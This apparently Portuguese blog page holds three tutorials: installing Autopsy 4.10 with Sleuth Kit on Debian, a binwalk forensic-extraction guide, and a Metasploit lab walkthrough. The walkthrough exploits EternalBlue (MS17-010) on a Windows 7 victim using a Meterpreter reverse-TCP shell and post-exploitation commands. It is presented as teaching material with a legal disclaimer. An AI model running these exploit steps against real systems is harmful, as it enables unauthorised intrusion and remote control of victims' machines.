Por padrão, a versão do Autopsy que vem nos repositórios oficiais do Debian é a versão 2.24 porém para Windows já existe a versão 4.10. Como o Autopsy roda com o SleuthKit e Java no linux, vamos fazer um passo a passo dessas instalações.

Um ponto importante de se observar é que as versões atualizadas do Autopsy “acompanham” as versões atualizadas do Sleuth Kit. No caso do Autopsy 4.10, a versão utilizada do Sleuth Kit é a 4.6.5. Essa verificação é feita pelo script de instalação e caso esteja diferente, a instalação não será concluída. No caso de atualização do Autopsy, também é necessário a atualização do Sleuth Kit.

No nosso caso, vamos utilizar o Debian 9, porém pode ser instalada em qualquer outra distribuição baseada no Debian (Ubuntu, Kali, Parrot, Caine…), pois vamos utilizar um arquivo .deb.
No final do post há uma lista com todos os comandos utilizados sem as explicações, caso seja um usuário avançado ou não queira ver as explicações do post.

Preparando o Ambiente

O Debian que estou utilizando está em sua configuração padrão, apenas com o Vim e Terminator instalados e o usuário utilizado é o root (apenas para melhor compreensão do post).

Então vamos começar atualizando o sistema:

apt update && apt -y upgrade

Agora vamos instalar o photorec, programa necessário para a execução do Autopsy

apt -y install testdisk

O Debian 9 já vem com o Java OpenJDK 8 instalado, não sendo necessário fazer qualquer instalação Java. Caso queira atualizar ou usar outra aplicação Java, como da Oracle, não fará diferença para a execução do Autopsy, apenas trará as melhorias de cada pacote ou de um sistema sempre atualizado.
Mesmo assim, precisamos fazer uma configuração no Java para indicarmos onde está instalado o java. E primeiramente, vamos pegar o diretório onde o OpenJDK está instalado com:

java -XshowSetting

Vamos procurar uma linha com o conteúdo parecido com esse: java.home = /usr/lib/jvm/java-8-openjdk-amd64/jre
Lembrando que a saída do “java.home” pode variar de acordo com o sistema instalado.

Em seguida, adicione essa informação na variável de ambiente do Debian para que o sistema reconheça através da variável $JAVA_HOME onde está instalado o Java.

vim /etc/environment 

Adicione a seguinte linha no final do arquivo:

JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64/jre"

Depois basta salvar o arquivo e sair do editor com o comando:

:wq

Agora vamos carregar esse arquivo

source /etc/environment

E verificar se o sistema já reconhece o novo path

echo $JAVA_HOME

A saída será o diretório que consta no arquivo /etc/environment

Instalando o Sleuth Kit 4.6.5

Inicialmente, vamos baixar o arquivo .deb de instalação do SleuthKit

wget https://github.com/sleuthkit/sleuthkit/releases/download/sleuthkit-4.6.5/sleuthkit-java_4.6.5-1_amd64.deb

E em seguida instalar esse pacote

apt install ./sleuthkit-java_4.6.5-1_amd64.deb 

Caso apresente algum erro com falta de alguma dependência, basta executar “apt -f install” e depois fazer a instalação do sleuthkit novamente repetindo o comando acima (apt install ./sleuthkit-java_4.6.5-1_amd64.deb).

Instalando o Autopsy 4.10

Agora, basta fazer o download do Autopsy 4.10 no github oficial

wget https://github.com/sleuthkit/autopsy/releases/download/autopsy-4.10.0/autopsy-4.10.0.zip

Extrair o pacote:

unzip autopsy-4.10.0.zip && cd autopsy-4.10.0

Executar o instalador:

sh unix_setup.sh

Acessar o diretório bin/ dentro do diretório do autopsy

cd bin

E executar o autopsy

./autopsy
Debian 9.9 – Kernel 4.9 – Java 8 OpenJDK
Parrot OS 4.6 – Kernel 4.19 – Java 11 OpenJDK

Sugiro que criem um atalho para a execução do programa para não ter que acessar o diretório e executar o programa sempre for utilizar.

O objetivo deste post é apenas ajudar aos peritos que utilizam Linux, porém sentiam falta de uma versão mais atualizada do Autopsy no Linux e tinham que recorrer ao Windows, muita vezes tendo que interromper o fluxo de trabalho para a troca de sistema operacional.

Comando utilizados para caso alguém queira fazer um script (e postar nos comentários depois):

apt update && apt -y upgrade && apt -y install testdisk
echo JAVA_HOME=\"/usr/lib/jvm/java-8-openjdk-amd64/jre\" >> /etc/environment
source /etc/environment
wget https://github.com/sleuthkit/sleuthkit/releases/download/sleuthkit-4.6.5/sleuthkit-java_4.6.5-1_amd64.deb && wget https://github.com/sleuthkit/autopsy/releases/download/autopsy-4.10.0/autopsy-4.10.0.zip && unzip autopsy-4.10.0.zip
apt -y install ./sleuthkit-java_4.6.5-1_amd64.deb
cd autopsy-4.10.0
sh unix_setup.sh
./autopsy

Caso dê erro: apt -f install && apt -y install ./sleuthkit-java_4.6.5-1_amd64.deb

https://www.autopsy.com/
https://www.sleuthkit.org/
https://github.com/sleuthkit/sleuthkit/releases/tag/sleuthkit-4.6.5
https://github.com/sleuthkit/autopsy/releases/tag/autopsy-4.10.0
https://github.com/sleuthkit/autopsy/blob/develop/Running_Linux_OSX.txt

Ao som de: Testament – The Pale King

O Metasploit Framework é uma ferramenta para desenvolvimento de Exploits com Payloads com o intuito de explorar vulnerabilidades! Simples! Não? Ok! Vamos por partes…

Framework: Você vai achar muitas definições de framework na internet, mas no nosso caso pode ser definido como um conjunto de ferramentas agrupadas em uma mesma solução. A ideia do framework é evitar retrabalhos ou utilização desnecessárias de uma mesma ferramenta ou código em um mesmo projeto. Sempre você vai ver um framework que vai te ajudar a automatizar trabalhos desnecessários ou mesmo aproveitamento de trabalhos já realizados. Resumindo: o Framework vai te ajudar a gerenciar melhor o seu trabalho.

Exploits: É por onde o ataque tem início, pois pode ser um código malicioso ou um software que utiliza-se de uma vulnerabilidade para atacar o sistema como um todo ou parte dele, assim abrindo caminho para a injeção de outro código, o Payload. Há 2 tipos de Exploits: Conhecidos e Desconhecidos (mais conhecidos por 0-day)

Payloads: Após o Exploit “abrir caminho” explorando uma falha ou vulnerabilidade, é executado um código que tem como função comprometer o sistema. O Payload que fará a transmissão de dados e a parte nociva já depois do sistema ter sido comprometido pela vulnerabilidade utilizando o Exploit.

Vulnerabilidade: é uma condição que quando explorada por um atacante pode resultar em uma violação de segurança.

 

Explicando o Cenário

Agora que a ferramenta foi explicada na teoria, podemos passar para a parte prática!

Nesse cenário há duas máquinas: Parrot Linux 4.4 64 bits (Atacante) e Windows 7 SP1 64bits (Vítima).
A Rede que estou usando é a 172.16.205.0/24

Como estou utilizando o Parrot 4.4, a ferramenta já vem instalada. No Kali Linux, também vem instalada. Caso queira instalar em alguma distribuição que não venha instalada, fazer o download na página oficial: https://www.metasploit.com/

Vou utilizar a vulnerabilidade reportada como MS17-010 (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/MS17-010) popularmente conhecida como EternalBlue. A falha acontece no protocolo SMBv1, que é utilizado para a troca de arquivos pela rede. Essa vulnerabilidade ficou famosa, pois foi utilizada para espalhar os ransomwares WannaCry, Petya/NotPetya, e Bad Rabbit.

 

Preparando o Sistema

Inicialmente, vamos iniciar o nosso banco de dados postgres para que esse possa se integrar ao Metasploit.

systemctl start postgresql

 

Depois vamos iniciar o Metasploit

msfconsole

 

Vamos verificar o status da conexão com o banco de dados.

db_status

Caso retorne esse erro: “postgresql selected, no connection”…

 

Ou ao iniciar, apareça erros ao conectar ao banco de dados:

 

Seguir os seguintes passos:

exit (Sair do metasploit)
su postgres (Acessar o usuário postgres e tem que estar como root para poder mudar de usuário)
createuser root -P (Criar o usuário root e definir uma senha para ele)
createdb --owner=root msf_database (Criar uma entrada no banco de dados)
exit (Sair do usuário postgres)
msfconsole (Entrar no metasploit novamente)
db_connect root:senha_que_voce_definiu@127.0.0.1:5434/msf_database

Caso não funcione na porta 5434, olhe se a porta do postgres não é a 5432

Depois só conferir:

db_status

 

Caso queira fazer uma busca genérica usando o módulo Nmap que há no Metasploit, assim adicionando as informações do hosts no banco de dados:

db_nmap -A 172.16.205.0/24

Para ver os hosts que foram localizados com essa busca, basta digitar:

hosts

 

Buscando uma vítima

Como o post é direcionado para a falha EternalBlue, vamos procurar o módulo auxilar para realizar a busca na rede:

search smb_ms17_010

Vamos selecionar o módulo que apareceu:

use auxiliary/scanner/smb/smb_ms17_010

Após isso, vamos ver as suas opções:

show options

 

No nosso caso, precisamos colocar o Range de IP que vamos scannear

set RHOSTS 172.16.205.0/24

Vamos aumentar as threads para agilizar o scan

set threads 100

Depois de tudo configurado, agora é executar:

run ou exploit

 

Preparando o Exploit

Dentre o range selecionado, irá ser exibido as máquinas vulneráveis ao EternalBlue. Depois do alvo localizado, vamos iniciar o ataque.

Vamos buscar o exploit da falha EternalBlue

back
search ms17_010_eternalblue

 

Aparecem duas opções, mas vamos utilizar a primeira opção, pois a segunda é para Windows 8

use exploit/windows/smb/ms17_010_eternalblue

Assim como o scanner, vamos ver as opções:

show options

Como sabemos qual máquina é vulnerável a esse ataque, vamos colocar o IP dela no Exploit:

set rhost 172.16.205.129

 

Selecionando o Payload

Depois, vamos selecionar qual Payload vamos utilizar nesse Exploit. Nesse caso, mandei exibir todos os que são compatíveis com o Exploit:

show payloads

 

Para esse exemplo, vamos usar o meterpreter com conexão TCP Reversa

set payload windows/x64/meterpreter/reverse_tcp

Como a conexão será reversa, ou seja, a vítima que vai se comunicar com o atacante, devemos informar qual IP será conectado de volta.

set lhost 172.16.205.1

Vamos verificar se não está faltando nenhuma opção no Exploit ou no Payload:

show missing

 

Como está tudo certo, vamos executar:

run ou exploit

 

Acessando a Máquina da Vítima

Após isso, a conexão com o Windows já está ativa. Agora é só utilizar as ferramentas do meterpreter. Para listar todas basta digitar help. Mas como falar sobre todas as ferramentas não é o tema de post, vamos ver algumas:

Exibir informações do computador:

sysinfo

Exibir em qual usuário está sendo executado no Windows

getuid

Ter acesso ao Shell

shell

 

O comando PS exibe todas os processos na máquina da vítima.

 

Também é possível executar comandos do windows sem entrar no modo shell, usando o comando execute:

 

O intuito desse post é mostrar como um sistema com a configuração padrão, sem um bom sistema de proteção como antivirus, firewall e/ou antimalware, pode se tornar um alvo fácil. Note que em momento algum foi solicitado qualquer intervenção do usuário do computador Windows. Isso também mostra o perigo de se conectar a redes públicas/abertas.

 

Este artigo tem a finalidade meramente acadêmica. Os autores desse artigo, e de qualquer outro artigo deste site, não se responsabilizam por qualquer atividade relacionada a esse material sendo executadas por qualquer pessoa. O uso indevido dessas informações podem resultar em acusações criminais interpostas contra as pessoas em questão.

 

https://github.com/rapid7/metasploit-framework
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

Ao Som de: Metallica – One

O Binwalk é uma ferramenta criada pelo Craig Heffner e feita para realizar buscas em arquivos de imagens (raw). Ela foi pensada para fazer a análise e extração de códigos e arquivos dentro de firmwares, porém como ela é bastante poderosa, acaba sendo utilizadas para outros fins. O intuito desse post é demonstrar que um desses possíveis cenários de utilização desse software no campo da computação forense, e assim apresentar mais uma ferramenta que possa ser utilizada em uma análise forense. Isso não quer dizer que ela substitui qualquer outra ferramenta! Existem ferramentas específicas para cada tipo situação e de análise. Porém, assim como qualquer outra ferramenta, ela server para ajudar um profissional capacitado a chegar um resultado desejado.

O programa utiliza a biblioteca libmagic, assim reconhece os “Magic Numbers” no bloco de dados de um arquivo, conseguindo identificar o tipo de arquivo dentro de uma imagem. Porém, ele também contém uma lista extra desses números mágicos para ficar ainda mais completo.

“Números Mágicos” ou “Magic Numbers” é o termo utilizado para designar as constantes de um tipo de arquivo, assim definindo as assinaturas desses arquivos e assim criando um padrão para a identificação desses arquivos. Essa assinatura se localiza no início do bloco de informação do arquivo. Por exemplo: Todo arquivo arquivo PNG irá começar com esse dados em HEXADECIMAL 89 50 4E 47 0D 0A 1A 0A.

Para observar esses dados, basta abrir qualquer arquivo em um editor Hexadecimal de sua preferência. Também iremos verificar esses dados usando o binwalk.
Caso queira uma lista de alguns números mágicos, existem várias listas na internet, como esta do Wikepédia: https://en.wikipedia.org/wiki/List_of_file_signatures

 

Instalação

Para fazer a instalação do binwalk, basta utilizar o gerenciador de repositórios da sua distribuição ou fazer o download no Github oficial da ferramenta: https://github.com/ReFirmLabs/binwalk

Algumas distribuições Linux já possuem essa ferramenta em seu repositório.

 

git clone https://github.com/ReFirmLabs/binwalk.git
cd binwalk
sudo python setup.py install
 
Caso esteja utilizando o Python 2.x, instale a dependência:
sudo apt install python-lzma ou sudo yum install pyliblzma

Utilização

A sintaxe do programa é bem simples

$ binwalk [opções] [arquivo]

Caso não utilize nenhum argumento, o binwalk fará uma varredura no arquivo e exibirá os arquivos correspondentes as suas assinaturas compostas nos cabeçalhos utilizando os números mágicos. Há basicamente 3 colunas: Decimal e Hexadecimal, exibe a posição, nos respectivos nomes, do início do número mágico de um arquivo. A terceira coluna é a descrição do arquivo que foi localizado nas duas primeiras colunas.

 

Filtros

Como o retorno da pesquisa dos arquivos pode ser muito grande, é possível aplicar “filtros” para você ver apenas o que está buscando especificamente.

Filtro de Inclusão

-y ou –include=<filtro>

A opção -y inclui apenas os resultados correspondentes para o texto (ou string) de pesquisa especificado. Nessa pesquisa, serão retornados apenas arquivos onde os “Magic Numbers” são possíveis de ser identificados. É possível utilizar expressões regulares para a pesquisa.

$ binwalk -y image exemplo.raw

Exibe apenas as imagens encontradas no arquivo

Filtro de Exclusão

-x ou –exclude=<filtro>

A opção -x é o oposto da anterior (-y) e exclui o texto especificado (ou string) que corresponde a regra nos resultados da pesquisa. Assim como a pesquisa, a exclusão também pode usar expressões regulares. Também apresenta os resultados baseado nas assinaturas dos arquivos.

$ binwalk -x image exemplo.raw

Comparação de Arquivos

 

-W ou –hexdump

O binwalk pode exibir os códigos hexadecimais de arquivos e exibir a diferença e semelhança entre eles. Para fazer essa diferenciação, ele utiliza 3 cores para demonstrar cada uma dessas diferenças e semelhanças.

Verde: Os bytes semelhantes em todos os arquivos;
Vermelho: Os bytes diferentes em todos os arquivos;
Azul: Os bytes diferentes em apenas um arquivos.

$ binwalk -W arquivo01.raw arquivo02.raw arquivo03.raw

Para melhor visualização, podemos aplicar alguns argumentos para limitar a exibição das informações. No nosso exemplo, vamos utilizar:

–block para limitar o tamanho do bloco, em bytes, que será exibido;
–length para exibir apenas a quantidade de bytes selecionados.

$ binwalk -W --block=8 --length=128 *.mp3

No nosso exemplo, podemos identificar nos 3 arquivos que os primeiros bytes são idênticos. Isso acontece pois são 3 arquivos de áudio em MP3 e os “Números Mágicos” nos informa que existe a ID3 Tag nesses arquivos. A assinatura da ID3 tag é “49 44 33”. Como o padrão se repete em todos, esses dados estão em verde.

Seguindo o arquivo, podemos observar que mais uma informação é idêntica nos 3 arquivos. É possível ver o “texto” TALB. Lendo a documentação do ID3tag (http://id3.org/id3v2.3.0), esse campo corresponde ao “Álbum” em que essa MP3 pertence (TALB [#TALB Album/Movie/Show title]). Mas isso não quer dizer que as 3 MP3 são do mesmo Álbum e sim que os 3 arquivos estão com esse campo da ID3 Tag preenchidas. Por esse motivo, podemos observar um bloco bem maior de dados em vermelho, pois são 3 músicas de álbuns diferentes.

Se avançarmos um poucos mais, veremos o “TPE1”, que corresponde ao “Artista” da música. Mesmo essa informação presente nos 3 arquivos, eles não estão na mesma posição, por isso continua em vermelho. Isso acontece por causa dos nomes dos Álbuns, que são diferentes e não tem o mesmo número de caracteres.

Observando essas informações, podemos concluir:
musica01.mp3: Álbum (TALB): “The Rise and Fall of Ziggy Stardust and The Spider From Mars” e Artista (TPE1): “David Bowie”
musica02.mp3: Álbum (TALB): “Scenes From a Memory” e Artista (TPE1): Dream Theater
musica03.mp3: Álbum (TALB): “Just The Two of Us, Me And Then” e Artista (TPE1): MindFlow

Os dados em azul são que estão iguais em 2 arquivos, mas no terceiro. No exemplo abaixo, peguei 2 músicas do mesmo álbum e uma de um terceiro álbum. Usando as informações acima, fica fácil ver a semelhança entre os 2 primeiros e o terceiro arquivo.

Pesquisa RAW

 

-R ou –raw=<string>

 

A pesquisa RAW permite que você faça uma busca diretamente no arquivo, podendo conter strings octal, hexadecimal ou texto puro.

No nosso exemplo, vou utilizar uma MP3 da banda MindFlow e ela contém os metadados da ID3 tag preenchida.

Vamos fazer a busca pelo nome da banda dentro da MP3. Como é um nome composto, vamos procurar pelos primeiro nome apenas:

$ binwalk -R "Mind" musica03.mp3

Caso não retorne nenhuma resposta, pode tentar com outros argumento, como o segundo nome, o nome completo, o texto em caixa alta ou baixa, ou até mesmo em Hexadecimal:

$ binwalk -R "\x4D\x69\x6E\x64" musica03.mp3

Observe que o retorno estão exatamente na mesma posição inicial da busca antetior. O binwalk fez uma varredura no hexadecimal da MP3 e encontrou essas informações no metadados ID3 Tag do arquivo.

Extração de Arquivos

Como o binwalk é capaz de reconhecer arquivos dentro de um outro arquivo, também é possível fazer a extração desses desses arquivos para um diretório.

Extraindo manualmente

 

-D ou -dd=<Tipo:Extensão:Comando>

 

O formato usado para extrair a regra especificada é:
Tipo:Extensão:Comando

Tipo: string, em “caixa baixa”, para informar o tipo do arquivo que se quer extrair;
Extensão: define qual será a extensão que o arquivo será salvo no diretório. Por padrão, o binwalk não coloca nenhuma extensão;
Comando: é um argumento opcional para ser executado após a extração para o diretório.

$ binwalk --dd='zip archive:zip:unzip %e' exemplo.raw

No exemplo acima:

–dd: informa que será feito uma extração de arquivo;
zip archive: será localizado todos os arquivos que contêm a assinatura de um arquivo ZIP;
zip: todos os arquivos localizados com essa assinatura será salvos com a extensão .zip;
unzip: após os arquivos “zip archive” serem localizados, depois salvos como .zip, esse arquivos serão extraídos com o unzip.
%e: é onde você deve informar onde o diretório para a extração desses “zip archives”

Por padrão, os nomes dos arquivos serão atribuídos às suas posições hexadecimais incluindo a extensão encontrada nos números mágicos. Os “zip archives” extraídos da imagem estarão com os nomes: 6BF9434.zip, 39F3593.zip, 39F3660.zip

Caso queira extrair tudo que o binwalk possa localizar, basta usar a expressão regular com * para fazer a extração:

$ binwalk --dd='.*' file.bin

Extraindo automaticamente

Caso utilize a extração automática, o binwalk irá criar um diretório automaticamente com os arquivos extraídos.

$ binwalk -e exemplo.raw

A opção -e é usada para executar a extração automática dos dados. O binwalk só vai conseguir extrair os arquivos que serão identificados pelos números mágicos.

Extração recursiva

 

-M ou –matryoshka

A opção -M (–matryoshka) fará a extração de forma recursiva, porém ela só pode ser usada se combinada com a opção -e (ou –extract)

$ binwalk -Me exemplo.raw

 

LOG

-f ou –log=<arquivo.log>

Nos sistemas operacionais modernos, podemos concatenar as informações de saída de fluxo (stdout) para outro fluxo de informações. Geralmente usamos essas saídas de informações concatenadas com ‘>’ para gerarmos um arquivo de “log” escrevendo um arquivo de texto. Porém, o binwalk já tem um argumento para isso, que é o -f (ou –log)

$ binwalk -f saída_dos_dados.log exemplo.raw

Caso queira que esses dados sejam extraídos diretamente para um arquivo no formato CSV, pode se utilizar o argumento –csv já combinado com o -f

$ binwalk -f saída_dos_dados.csv --csv exemplo.raw

Utilizando o comando acima, será exibida a informação na tela e também criado o arquivo csv. Se deseja que apenas o arquivo seja criado com essas informações, sem a exibição no terminal, basta usar o -q (ou –quiet).

$ binwalk -q -f saída_dos_dados.csv --csv exemplo.raw

 

 

Exemplo Prático:

Primeiramente, vamos usar o binwalk padrão:

$ binwalk Trabalho.pdf

 

No nosso caso, retornou algumas informações. Na primeira posição foi encontrada a assinatura do “PDF Document, version 1.4”. Verificando o arquivo no nosso editor hexadecimal, podemos ver o “número mágico” do pdf (25 50 44 46).

Seguindo o arquivo, o binwalk encontrou a biblioteca zlib, pois o pdf a utiliza para essa biblioteca para a compressão de dados, além dos metadados dos arquivos. Porém, foi encontrado uma assinatura de JPG (posição 0x90F6) e dois PDF (0x21C3C e 0x2F37D).

Agora, vamos fazer a extração de todos os arquivos para não perder muito tempo e depois da extração, localizar os arquivos.

$ binwalk --dd='.*' Trabalho.pdf

 

Após os arquivos extraídos, vamos separar os arquivos com os nomes das posições onde foram encontrados, com exceção da posição “0” pois já  sabendo que é o arquivo que conseguirmos ver normalmente.

90F6 = Imagem JPG
21C3C = Primeiro PDF
2F37D = Segundo PDF

Utilizando um editor hexadecimal, e olhando essas posições indicadas pela aplicação, podemos extrair os blocos e verificar os arquivos. A extração será feita nas assinaturas seguintes. Assim como o anterior, a primeira assinatura identificada foi depois do PDF visível foi o JPG, vamos selecionar o bloco entre o início do suposto JPG (0x90F6) e o início do segundo PDF (0x21C3C), logo em seguida vamos do início do segundo PDF até o começo do terceiro PDF (0x2F37D) e esse vai até o final do arquivo.

 

O resultado nos dois casos será o mesmo:

 

Em um arquivo PDF havia uma imagem e mais 2 PDFs “escondidos” dentro dele. Isso tudo foi possível observando os números mágicos que haviam no arquivo “principal”

Como disse inicialmente, a ideia deste post é apresentar mais uma ferramenta para análises forenses. Em alguns dos exemplos mostrados, existem softwares que nos exibem as informações mais legíveis e mais rápido, como é o caso do ID3 Tag, onde há vários leitores como o PoodleTag. Mas o binwalk também pode ser usado justamente para confirmar esses dados dos outros aplicativos. A combinação “binwalk + editor hexadecimal” podem nos trazer muitos resultados positivos nas mãos de bons peritos forense.

 

https://tools.kali.org/forensics/binwalk
https://github.com/ReFirmLabs/binwalk/wiki/quick-start-guide
https://securityonline.info/introduction-to-binwalk-firmware-analysis-tool/

 

Ao Som de: Criolo – Não Existe Amor em SP